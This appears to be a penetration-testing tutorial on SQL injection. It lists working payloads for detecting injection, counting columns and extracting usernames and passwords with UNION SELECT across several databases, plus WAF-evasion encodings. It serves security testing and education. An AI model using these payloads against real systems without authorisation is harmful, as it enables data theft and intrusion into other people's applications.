SQL Injection Testing: From Detection to Data Extraction

SQL Injection (SQLi) is one of the most impactful vulnerabilities a tester can find. It can lead to data theft, authentication bypass, and in some cases, remote code execution. This guide walks through the complete SQLi testing methodology.

Step 1: Detection

Before extracting data, you need to confirm the injection point. Start with these probes:

Boolean-Based Detection

' AND 1=1-- (true condition - normal response)
' AND 1=2-- (false condition - different response)

If the responses differ, you likely have a boolean-based SQLi.

Time-Based Detection

' AND SLEEP(5)--         (MySQL)
'; WAITFOR DELAY '0:0:5'-- (MSSQL)
' AND pg_sleep(5)--      (PostgreSQL)

If the response is delayed by 5 seconds, time-based blind SQLi is confirmed.

Error-Based Detection

' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))-- (MySQL)
' AND 1=CAST(version() AS int)--              (PostgreSQL)
' AND 1=CONVERT(int,@@version)--              (MSSQL)

Step 2: Determine Column Count

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- (until error)

Or use UNION with NULLs:

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

Step 3: Extract Data

Once you know the column count, extract data using UNION SELECT:

' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--

Database-Specific Cheat Sheet

Each database has unique syntax. Use our SQL Injection Generator to auto-generate payloads for MySQL, PostgreSQL, MSSQL, Oracle, and SQLite. See the full SQL Injection Cheat Sheet for 70+ payloads.

WAF Bypass Techniques

When a WAF blocks your payloads, try:

• Inline comments: /*!UNION*/ /*!SELECT*/
• Case variation: uNiOn SeLeCt
• URL encoding: %55NION %53ELECT
• Newline injection: UNION%0ASELECT

Our WAF Bypass Generator can automatically apply these techniques to any payload. You can also chain WAF bypass encoding with the Encoding Pipeline for multi-layer obfuscation.

Related Reading

SQL injection is frequently chained with other attacks. Use Command Injection payloads when SQLi leads to OS command execution (e.g., via xp_cmdshell in MSSQL). For NoSQL databases like MongoDB, see our NoSQL Injection Generator instead. Explore our SSRF Exploitation Guide to learn how SQLi can enable server-side request forgery, or read the XSS Payloads Guide for second-order attacks where SQL-injected data triggers XSS.